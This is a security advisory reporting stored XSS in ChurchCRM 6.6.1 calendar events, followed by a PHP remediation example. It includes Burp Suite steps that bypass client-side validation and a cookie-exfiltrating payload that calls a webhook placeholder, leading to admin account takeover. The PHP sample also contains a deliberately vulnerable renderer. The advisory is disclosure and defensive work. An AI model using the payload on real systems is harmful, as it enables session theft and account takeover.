Stored Cross-Site Scripting (XSS) in Create Events in Church Calendar Leading to Account Takeover (ChurchCRM latest version 6.6.1)
Date: January 5, 2026
Researcher: Nguyen Truong Son (truongson526@gmail.com)
Summary
A Stored Cross-Site Scripting (XSS) vulnerability exists in Create Events in the Church Calendar. A user with low privileges can place an XSS payload in the Description field. The payload is stored in the database, and when any other user views that event (including the admin), the payload executes in their browser, leading to account takeover.
Details
When creating an event in the Calendar section, user input is validated only in the user interface (client-side); the server accepts whatever it receives. An attacker can use Burp Suite to intercept the request and insert an XSS payload into the Description field. The payload is then stored in the database unchanged. When another user views the event created by the attacker, the payload is triggered and the attacker obtains that user's cookie, leading to account takeover.
Vulnerable field:
Endpoint: POST /api/events/{id}
Name of JSON field: Desc
PoC
Video PoC: https://drive.google.com/drive/u/0/folders/12baz_wj1_MGeMZe6ah5NxqGDlitJFw_e
- Log in as a low-privilege user.
- I created a new user who only has the right to create events in the Calendar (Username: attacker_1).
- Log in as user “attacker_1” and go to the Calendar section.
- Create a new event with the following content, turn on Intercept in Burp Suite, then click “Save”.
- Description: <img src=x onerror=fetch('{webhook URL}?cookie='+document.cookie)>
- In the Intercept tab, you can see that the value of the Desc field has been validated (client-side).
- Send the request to Repeater and modify the value of the Desc field:
- Drop the request in the Intercept tab, then turn Intercept off. The newly created event is now displayed in the interface.
- Log in as admin (Church Admin), go to the Calendar section, then click on the event the attacker just created (Attacker event). Observing the results on the webhook, I noticed that the cookies were being sent.
- Replace the obtained cookie -> Reload the page -> Gain access to the admin account.
Impact
- Session hijacking / account takeover: theft or use of victims’ session tokens, or performance of state-changing actions via the victim’s session.
- Privilege escalation: targeting admins/moderators who review content can lead to full application compromise.
- Data exposure and integrity loss: read/modify user data, change account settings, initiate transactions, add backdoor admins, etc.
- Wider compromise: can be chained with CSRF bypasses, OAuth token theft (if tokens are handled in the DOM), or service worker abuse.
Recommendation
- Implement output encoding (htmlspecialchars) wherever the field is rendered.
- Validate and sanitize data on the server side, not only in the user interface.
- Consider using a central escaping library or templating engine so that encoding cannot be forgotten in individual views.
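The following PHP is an added example, not ChurchCRM's own code: it places the vulnerable rendering pattern beside the hardened one and shows the server-side check the API endpoint should apply to the Desc field. The 2000-character limit and the example.invalid URL are assumed values.

```php
<?php
// Added example (not ChurchCRM's code): vulnerable vs. hardened rendering of the
// stored event description, plus server-side validation of the "Desc" field.
declare(strict_types=1);

// VULNERABLE: the stored description is echoed into the page unchanged, so a
// payload saved via the API (bypassing the UI-only check) executes for viewers.
function renderDescriptionVulnerable(string $desc): string
{
    return '<div class="event-desc">' . $desc . '</div>';
}

// HARDENED: encode on output. ENT_QUOTES also encodes ' and " so the value is
// safe in attribute context; ENT_SUBSTITUTE avoids returning an empty string
// on invalid UTF-8 (which would silently hide the stored value).
function renderDescriptionSafe(string $desc): string
{
    $encoded = htmlspecialchars($desc, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="event-desc">' . $encoded . '</div>';
}

// Server-side validation for the JSON body of POST /api/events/{id}. The UI
// check is not a control: anything a proxy can rewrite must be re-checked here.
// Returns the validated description or throws.
function validateEventDesc(array $json): string
{
    if (!array_key_exists('Desc', $json) || !is_string($json['Desc'])) {
        throw new InvalidArgumentException('Desc must be a string');
    }
    $desc = $json['Desc'];
    if (!mb_check_encoding($desc, 'UTF-8')) {
        throw new InvalidArgumentException('Desc must be valid UTF-8');
    }
    if (mb_strlen($desc, 'UTF-8') > 2000) { // assumed limit
        throw new InvalidArgumentException('Desc too long');
    }
    return $desc; // store raw text; the hardened renderer neutralises it on output
}

// Constructed request body shaped like the advisory's payload (harmless URL).
$body = json_decode('{"Desc":"<img src=x onerror=fetch(\'https://example.invalid/?c=\'+document.cookie)>"}', true);
$desc = validateEventDesc($body);

$safe = renderDescriptionSafe($desc);
assert(strpos($safe, '<img') === false);                               // no tag survives
assert(strpos($safe, '&lt;img') !== false);                            // shown as text
assert(strpos(renderDescriptionVulnerable($desc), '<img') !== false);  // the bug
echo $safe, PHP_EOL;
```

The same encoding must be applied in every view that prints the description (calendar popup, event detail, listings); encoding in one place and not another leaves the stored payload live.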